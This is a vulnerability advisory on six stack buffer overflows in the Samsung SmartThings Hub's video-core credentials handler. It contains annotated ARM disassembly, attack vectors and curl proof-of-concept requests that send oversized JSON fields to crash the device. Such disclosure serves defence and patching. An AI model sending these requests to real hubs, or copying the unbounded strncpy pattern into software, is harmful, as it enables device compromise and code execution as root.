### SummaryMultiple exploitable buffer overflow vulnerabilities exist in the`credentials` handler of `video-core`'s HTTP server of SamsungSmartThings Hub. The `video-core` process incorrectly extracts fieldsfrom a user-controlled JSON payload, leading to a buffer overflow on thestack. An attacker can send an HTTP request to trigger thisvulnerability.### Tested VersionsSamsung SmartThings Hub STH-ETH-250 – Firmware version 0.20.17### Product URLs[https://shop.smartthings.com/products/samsung-smartthings-hub](https://shop.smartthings.com/products/samsung-smartthings-hub)### CVSSv3 Score9.9 – CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H### CWECWE-120: Buffer Copy without Checking Size of Input ('Classic BufferOverflow')### DetailsSamsung produces a series of devices aimed at controlling and monitoringa home, such as wall switches, LED bulbs, thermostats and cameras. Oneof those is the Samsung SmartThings Hub, a central controller whichallows an end user to use their smartphone to connect to their houseremotely and operate other devices through it. The hub board utilizesseveral systems on chips. The firmware in question is executed by ani.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-Aarchitecture.The firmware is Linux-based, and runs a series of daemons that interfacewith devices nearby via ethernet, ZigBee, Z-Wave and Bluetoothprotocols. Additionally, the `hubCore` process is responsible forcommunicating with the remote SmartThings servers via a persistent TLSconnection. These servers act as a bridge that allows for securecommunication between the smartphone application and the hub. End userscan simply install the SmartThings mobile application on theirsmartphone to control the hub remotely.One of the features of the hub is that it connects to smart cameras,configures them and looks at their livestreams. For testing, we set upthe Samsung SmartCam SNH-V6414BN on the hub. Once done, the livestreamcan be displayed by the smartphone application by connecting either tothe remote SmartThings servers, or directly to the camera, if they'reboth in the same subnetwork.Inside the hub, the livestream is handled by the `video-core` process,which uses `ffmpeg` to connect via RTSP to the smart camera in its samelocal network, and at the same time, provides a streamable link for thesmartphone application.The remote SmartThings servers have the possibility to communicate withthe `video-core` process by sending messages in the persistent TLSconnection, established by the `hubCore` process. These messages canencapsulate an HTTP request, which `hubCore` would relay directly to theHTTP server exposed by `video-core`. The HTTP server listens on port3000, bound to the localhost address, so a local connection is needed toperform this request.We identified a vulnerable request that can be exploited to achieve codeexecution on the `video-core` process, which is running as root. Bysending a POST request for the "/credentials" path it's possible modifythe credentials used by the hub to connect to remote servers.Such request is handled by function `sub_3E4EC`: .text:0003E4EC sub_3E4EC .text:0003E4EC .text:0003E4EC dest = -0xCB4 .text:0003E4EC value = -0xCB0 .text:0003E4EC var_CAC = -0xCAC .text:0003E4EC var_CA0 = -0xCA0 .text:0003E4EC var_C90 = -0xC90 .text:0003E4EC var_C50 = -0xC50 .text:0003E4EC var_A70 = -0xA70 .text:0003E4EC var_14 = -0x14 .text:0003E4EC arg_0 = 4 .text:0003E4EC arg_4 = 8 .text:0003E4EC .text:0003E4EC 000 MOV R12, #:lower16:stru_C1D38 .text:0003E4F0 000 STMFD SP!, {R4-R7,R11,LR} .text:0003E4F4 018 MOVT R12, #:upper16:stru_C1D38 .text:0003E4F8 018 ADD R11, SP, #0x14 … .text:0003E564 CC0 BL http_required_json_parameters ; [1] .text:0003E568 CC0 CMP R0, #0 .text:0003E56C CC0 BNE loc_3E594 … .text:0003E594 loc_3E594 .text:0003E594 000 MOV R0, R4 .text:0003E598 000 BL json_tokener_parse ; [2] .text:0003E59C 000 SUBS R6, R0, #0 .text:0003E5A0 000 BEQ loc_3E93C .text:0003E5A4 000 MOV R1, #:lower16:aS3 ; "s3" .text:0003E5A8 000 SUB R2, R11, #-value .text:0003E5AC 000 MOVT R1, #:upper16:aS3 ; "s3" .text:0003E5B0 000 BL json_object_object_get_ex ; [3] … .text:0003E5BC 000 SUB R4, R11, #-var_A70 .text:0003E5C0 000 SUB R5, R11, #-var_A70 .text:0003E5C4 000 SUB R4, R4, #4 .text:0003E5C8 000 SUB R5, R5, #8 .text:0003E5CC .text:0003E5CC 000 MOV R1, #:lower16:aSecretkey ; "secretKey" .text:0003E5D0 000 SUB R2, R11, #-var_CA0 .text:0003E5D4 000 SUB R2, R2, #0xC .text:0003E5D8 000 MOVT R1, #:upper16:aSecretkey ; "secretKey" .text:0003E5DC 000 LDR R0, [R11,#value] .text:0003E5E0 000 BL json_object_object_get_ex … .text:0003E600 000 LDR R0, [R11,#var_CAC] .text:0003E604 000 BL json_object_to_json_string ; [4] .text:0003E608 000 MOV R7, R0 .text:0003E60C 000 BL strlen .text:0003E610 000 SUB R3, R11, #-var_14 .text:0003E614 000 MOV R2, #0 .text:0003E618 000 ADD R3, R3, R0 .text:0003E61C 000 MOV R0, R7 .text:0003E620 000 STRB R2, [R3,#-0x928] .text:0003E624 000 BL strlen .text:0003E628 000 MOV R1, R7 .text:0003E62C 000 MOV R2, R0 .text:0003E630 000 ADD R0, R4, #0x138 .text:0003E634 000 BL strncpy ; [5] .text:0003E638 000 MOV R1, #:lower16:aAccesskey ; "accessKey" .text:0003E63C 000 SUB R2, R11, #-var_CA0 .text:0003E640 000 LDR R0, [R11,#value] .text:0003E644 000 MOVT R1, #:upper16:aAccesskey ; "accessKey" .text:0003E648 000 SUB R2, R2, #0xC .text:0003E64C 000 BL json_object_object_get_ex … .text:0003E66C 000 LDR R0, [R11,#var_CAC] .text:0003E670 000 BL json_object_to_json_string .text:0003E674 000 MOV R7, R0 .text:0003E678 000 BL strlen .text:0003E67C 000 SUB R3, R11, #-var_14 .text:0003E680 000 MOV R2, #0 .text:0003E684 000 ADD R3, R3, R0 .text:0003E688 000 MOV R0, R7 .text:0003E68C 000 STRB R2, [R3,#-0x948] .text:0003E690 000 BL strlen .text:0003E694 000 MOV R1, R7 .text:0003E698 000 MOV R2, R0 .text:0003E69C 000 ADD R0, R4, #0x118 .text:0003E6A0 000 BL strncpy ; [6] .text:0003E6A4 000 MOV R1, #:lower16:aSessiontoken ; "sessionToken" .text:0003E6A8 000 SUB R2, R11, #-var_CA0 .text:0003E6AC 000 LDR R0, [R11,#value] .text:0003E6B0 000 MOVT R1, #:upper16:aSessiontoken ; "sessionToken" .text:0003E6B4 000 SUB R2, R2, #0xC .text:0003E6B8 000 BL json_object_object_get_ex … .text:0003E6D8 000 LDR R0, [R11,#var_CAC] .text:0003E6DC 000 BL json_object_to_json_string .text:0003E6E0 000 MOV R7, R0 .text:0003E6E4 000 BL strlen .text:0003E6E8 000 SUB R3, R11, #-var_14 .text:0003E6EC 000 MOV R2, #0 .text:0003E6F0 000 ADD R3, R3, R0 .text:0003E6F4 000 MOV R0, R7 .text:0003E6F8 000 STRB R2, [R3,#-0x8A8] .text:0003E6FC 000 BL strlen .text:0003E700 000 MOV R1, R7 .text:0003E704 000 MOV R2, R0 .text:0003E708 000 ADD R0, R4, #0x1B8 .text:0003E70C 000 BL strncpy ; [7] .text:0003E710 000 MOV R1, #:lower16:aBucket ; "bucket" .text:0003E714 000 SUB R2, R11, #-var_CA0 .text:0003E718 000 LDR R0, [R11,#value] .text:0003E71C 000 MOVT R1, #:upper16:aBucket ; "bucket" .text:0003E720 000 SUB R2, R2, #0xC .text:0003E724 000 BL json_object_object_get_ex … .text:0003E744 000 LDR R0, [R11,#var_CAC] .text:0003E748 000 BL json_object_to_json_string .text:0003E74C 000 MOV R7, R0 .text:0003E750 000 BL strlen .text:0003E754 000 SUB R3, R11, #-var_14 .text:0003E758 000 MOV R2, #0 .text:0003E75C 000 ADD R3, R3, R0 .text:0003E760 000 MOV R0, R7 .text:0003E764 000 STRB R2, [R3,#-0xC8] .text:0003E768 000 BL strlen .text:0003E76C 000 MOV R2, R0 .text:0003E770 000 ADD R0, R5, #0x990 .text:0003E774 000 MOV R1, R7 .text:0003E778 000 ADD R0, R0, #0xC .text:0003E77C 000 BL strncpy ; [8] .text:0003E780 000 MOV R1, #:lower16:aDirectory ; "directory" .text:0003E784 000 SUB R2, R11, #-var_CA0 .text:0003E788 000 LDR R0, [R11,#value] .text:0003E78C 000 MOVT R1, #:upper16:aDirectory ; "directory" .text:0003E790 000 SUB R2, R2, #0xC .text:0003E794 000 BL json_object_object_get_ex … .text:0003E7B4 000 LDR R0, [R11,#var_CAC] .text:0003E7B8 000 BL json_object_to_json_string .text:0003E7BC 000 MOV R7, R0 .text:0003E7C0 000 BL strlen .text:0003E7C4 000 SUB R3, R11, #-var_14 .text:0003E7C8 000 MOV R2, #0 .text:0003E7CC 000 ADD R3, R3, R0 .text:0003E7D0 000 MOV R0, R7 .text:0003E7D4 000 STRB R2, [R3,#-0x88] .text:0003E7D8 000 BL strlen .text:0003E7DC 000 MOV R2, R0 .text:0003E7E0 000 ADD R0, R5, #0x9D0 .text:0003E7E4 000 MOV R1, R7 .text:0003E7E8 000 ADD R0, R0, #0xC .text:0003E7EC 000 BL strncpy ; [9] .text:0003E7F0 000 MOV R1, #:lower16:aRegion ; "region" .text:0003E7F4 000 SUB R2, R11, #-var_CA0 .text:0003E7F8 000 SUB R2, R2, #0xC .text:0003E7FC 000 MOVT R1, #:upper16:aRegion ; "region" .text:0003E800 000 LDR R0, [R11,#value] .text:0003E804 000 BL json_object_object_get_ex … .text:0003E824 000 LDR R0, [R11,#var_CAC] .text:0003E828 000 BL json_object_to_json_string .text:0003E82C 000 MOV R7, R0 .text:0003E830 000 BL strlen .text:0003E834 000 SUB R3, R11, #-var_14 .text:0003E838 000 MOV R2, #0 .text:0003E83C 000 ADD R3, R3, R0 .text:0003E840 000 MOV R0, R7 .text:0003E844 000 STRB R2, [R3,#-0xD8] .text:0003E848 000 BL strlen .text:0003E84C 000 MOV R2, R0 .text:0003E850 000 ADD R0, R5, #0x980 .text:0003E854 000 MOV R1, R7 .text:0003E858 000 ADD R0, R0, #0xC .text:0003E85C 000 BL strncpy ; [10] …Note that the binary embeds the "json-c" library fromhttps://github.com/json-c/json-c that is used to manage JSON objects.The function initially calls `http_required_json_parameters` at [1] toverify that all the required parameters are specified in the JSONrequest, the parameters are: `s3.secretKey`, `s3.accessKey`,`s3.sessionToken`, `s3.bucket`, `s3.directory`, `s3.region`,`videoHostUrl`.The library function `json_tokener_parse` [2] is then used to parse thePOST data, and a JSON object is returned. Finally,`json_object_object_get_ex` [3] is used to retrieve each parameter fromthe main JSON object. This function, in turn, returns a new JSON objectfrom which a string is extracted, using `json_object_to_json_string`[4]. The resulting string is copied in a buffer on the stack using`strncpy` [5]: the destination buffer is calculated from `r4`, whichactually points on the stack. Moreover, the `length` value is set fromthe `strlen` output of the source string itself. At high level thiswould be: strncpy(stack_buffer, json_parameter, strlen(json_parameter));Since the `json_parameter` is controlled by the user, there is norestriction on the length of the copy operation, which allows foroverflowing the stack buffer and execute arbitrary code.We identified two different vectors that allow for exploiting thisvulnerability:- Anyone able to impersonate the remote SmartThings servers can send arbitrary HTTP requests to `hubCore` that would be relayed without modification to the vulnerable `video-core` process.- SmartThings SmartApps allow for creating custom applications that can be either published directly into the device itself or on the public marketplace. A SmartApp is executed inside the `hubCore` process and is allowed to make any localhost connection. It is thus possible for a SmartApp to send arbitrary HTTP requests directly to the vulnerable `video-core` process.A third vector might exist, which we didn't test. This would consist ofsending a malicious request from the SmartThings mobile application tothe remote SmartThings servers. In turn, depending on the remote APIsavailable, the servers could relay the malicious payload back to thedevice via the persistent TLS connection. To use this vector, anattacker would need to own a valid OAuth bearer token, or the relativeusername and password pair to obtain it.The following is a list of each vulnerability and its proof of concept.Each proof of concept uses the placeholder "OVERFLOW" to highlight thevulnerable parameter, which can be replaced with `"A"*4000` to make thedevice crash. A key with value "x" means that its value is irrelevant,but the key still needs to be present.#### CVE-2018-3873 – "secretKey" keyThe `strncpy` at [5] overflows the destination buffer, which has a sizeof 128 bytes. An attacker can send an arbitrarily long "secretKey" valuein order to exploit this vulnerability: $ curl -X POST 'http://127.0.0.1:3000/credentials' -d '{"s3":{"accessKey":"x","secretKey":"OVERFLOW","sessionToken":"x","region":"x","bucket":"x","directory":"x"},"videoHostUrl":"x"}'#### CVE-2018-3874 – "accessKey" keyThe `strncpy` at [6] overflows the destination buffer, which has a sizeof 32 bytes. An attacker can send an arbitrarily long "accessKey" valuein order to exploit this vulnerability: $ curl -X POST 'http://127.0.0.1:3000/credentials' -d '{"s3":{"accessKey":"OVERFLOW","secretKey":"x","sessionToken":"x","region":"x","bucket":"x","directory":"x"},"videoHostUrl":"x"}'#### CVE-2018-3875 – "sessionToken" keyThe `strncpy` at [7] overflows the destination buffer, which has a sizeof 2,000 bytes. An attacker can send an arbitrarily long "sessionToken"value in order to exploit this vulnerability: $ curl -X POST 'http://127.0.0.1:3000/credentials' -d '{"s3":{"accessKey":"x","secretKey":"x","sessionToken":"OVERFLOW","region":"x","bucket":"x","directory":"x"},"videoHostUrl":"x"}'#### CVE-2018-3876 – "bucket" keyThe `strncpy` at [8] overflows the destination buffer, which has a sizeof 64 bytes. An attacker can send an arbitrarily long "bucket" value inorder to exploit this vulnerability: $ curl -X POST 'http://127.0.0.1:3000/credentials' -d '{"s3":{"accessKey":"x","secretKey":"x","sessionToken":"x","region":"x","bucket":"OVERFLOW","directory":"x"},"videoHostUrl":"x"}'#### CVE-2018-3877 – "directory" keyThe `strncpy` at [9] overflows the destination buffer, which has a sizeof 160 bytes. An attacker can send an arbitrarily long "directory" valuein order to exploit this vulnerability: $ curl -X POST 'http://127.0.0.1:3000/credentials' -d '{"s3":{"accessKey":"x","secretKey":"x","sessionToken":"x","region":"x","bucket":"x","directory":"OVERFLOW"},"videoHostUrl":"x"}'#### CVE-2018-3878 – "region" keyThe `strncpy` at [10] overflows the destination buffer, which has a sizeof 16 bytes. An attacker can send an arbitrarily long "region" value inorder to exploit this vulnerability: $ curl -X POST 'http://127.0.0.1:3000/credentials' -d '{"s3":{"accessKey":"x","secretKey":"x","sessionToken":"x","region":"OVERFLOW","bucket":"x","directory":"x"},"videoHostUrl":"x"}'### Timeline * 2018-04-09 – Vendor Disclosure * 2018-05-23 – Discussion with vendor/review of timeline for disclosure * 2018-07-17 – Vendor patched * 2018-07-26 – Public Release
